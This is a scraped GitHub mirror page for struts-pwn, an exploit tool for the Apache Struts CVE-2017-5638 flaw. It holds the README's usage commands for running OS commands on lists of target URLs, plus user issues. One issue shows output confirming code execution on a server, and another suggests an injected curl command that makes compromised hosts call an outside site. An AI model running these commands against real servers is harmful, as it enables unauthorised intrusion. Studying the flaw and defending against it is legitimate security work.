mazen160 / struts-pwn Goto Github PK

View Code? Open in Web Editor NEW

424.0 22.0 138.0 10 KB

An exploit for Apache Struts CVE-2017-5638

License: MIT License

Python 100.00%

apache struts exploit cve-2017-5638 struts-pwn

struts-pwn's Introduction

struts-pwn

An exploit for Apache Struts CVE-2017-5638

Usage

Testing a single URL.

python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'

Testing a list of URLs.

python struts-pwn.py --list 'urls.txt' -c 'id'

Checking if the vulnerability exists against a single URL.

python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'

Checking if the vulnerability exists against a list of URLs.

python struts-pwn.py --check --list 'urls.txt'

Requirements

Python2 or Python3
requests

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed

Website: https://mazinahmed.net
Email: mazin AT mazinahmed DOT net
Twitter: https://twitter.com/mazen160
Linkedin: http://linkedin.com/in/infosecmazinahmed

struts-pwn's People

Contributors

Stargazers

Watchers

Forkers

arbazkiraak hoangcuongflp kbahaxor smallmeet followmaster vysecurity salewski minkione zshell random1984 rajivraj magnologan zephrfish songofhack jesobreira kaim1013 moriarty2016 rlgnszzz kaicastledine surajsinghbisht054 jakop345 infosechorse olivierh59500 lovebair2022 jeperez tabishimran ansjsun jnoxon tunisj havocparasite secoba redblack168 chosen1 bb33bb mgcfish lamkeysing92 arryboom rajeshroshanprasad kuteminh11 wivd vitalyorbit iamtutu scopion rcrax bhafsec 0x24bin peterpeter228 robin316 sauren-daxia akatie javarockstar int3grate james4388 bijaye paragbaxi cyberhack255 michalkoczwara tollopa wandong tr7989 yeyintminthuhtut detrojones qsdj dabaohuang flying0er tobey123 ganguoyin leohuang2015 blackap3rture sireof test123test111 hackmycontrolsystem ykankaya alibkaba bugsbunny1680 reboare jondonym d00mfist austinsonger jer1nj0y jepsonrob cgsecurity nanocybersec iulmt quyendang-dev 20100507 dannymas qingluan mrdgan shark-mk guigeek123 qq431169079 orf53975 attackgithub kaide0521 tudt3012 modulexcite freeide natrix-fork crim3hound

struts-pwn's Issues

ssl problem

the exploit code failed against https websites

Script Kiddies in log

Seeing this in my logs from a Script Kiddie.

80.15.195.28 - - [30/Apr/2017:10:34:21 +0000] "GET / HTTP/1.1" 200 0 "-" "struts-pwn (https://github.com/mazen160/struts-pwn)"

False negative on Struts 2.5.12

Just installed Struts 2.5.12 on Tomcat 9 as a test target running locally

http://127.0.0.1:8080/struts2-showcase/index.action shows the 'Welcome!' screen

$ ./struts-pwn.py -u 'http://127.0.0.1:8080/struts2-showcase/index.action'

[*] URL: http://127.0.0.1:8080/struts2-showcase/index.action
[*] Status: Not Affected.

Same result with any URL (even non-existent ones)

Issue with requests partial read

Urls have been obfuscated. On a vulnerable struts server, using the default struts-pwn, an IncompleteRead is returned with 0 bytes

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: xxxx/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
ERROR
[%] Done.

If this is swapped to be urllib2 however, a partial response is received:

    try:
        #rq = requests.get(url, headers=headers, timeout=timeout, allow_redirects=False) 
        #output = rq.text
        request = urllib2.Request(url, headers=headers)
        request = urllib2.urlopen(request).read()
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        print e.partial
        output = 'ERROR'
    return(output)

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: http://xxxx/test.action
[*] CMD: id
EXCEPTION::::--> IncompleteRead(54 bytes read)
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

ERROR
[%] Done.

I've yet to identify what behind the scenes is causing this error. Urllib3 appears to have the same behaviour as urllib2 (although I can't work out how to decode the response). Any idea if the way requests is working is causing issues?

passing url to the command var

Hey dude,

When doing a list any way to provide the url as a var in the command so you can log against which sites are vun?

python struts-pwn.py --list 'urls.txt' -c 'curl -L https://mysite.com/test.php?url='

error 104 - Connection reset by peer

Strangely enough, if I run the python script with --check, I get a response 200 and it shows my site as vulnerable.

If I try to run the exploit, then I get an Exception:
EXCEPTION::::--> ('Connection aborted.', error(104, 'Connection reset by peer'))

Any ideas what I can do to debug where/why the exception is being generated with the exploitable content-type?

mazen160 / struts-pwn Goto Github PK

struts-pwn's Introduction

struts-pwn

An exploit for Apache Struts CVE-2017-5638

Usage

Testing a single URL.

Testing a list of URLs.

Checking if the vulnerability exists against a single URL.

Checking if the vulnerability exists against a list of URLs.

Requirements

Legal Disclaimer

License

Author

struts-pwn's People

Contributors

Stargazers

Watchers

Forkers

struts-pwn's Issues

Recommend Projects

Recommend Topics

Recommend Org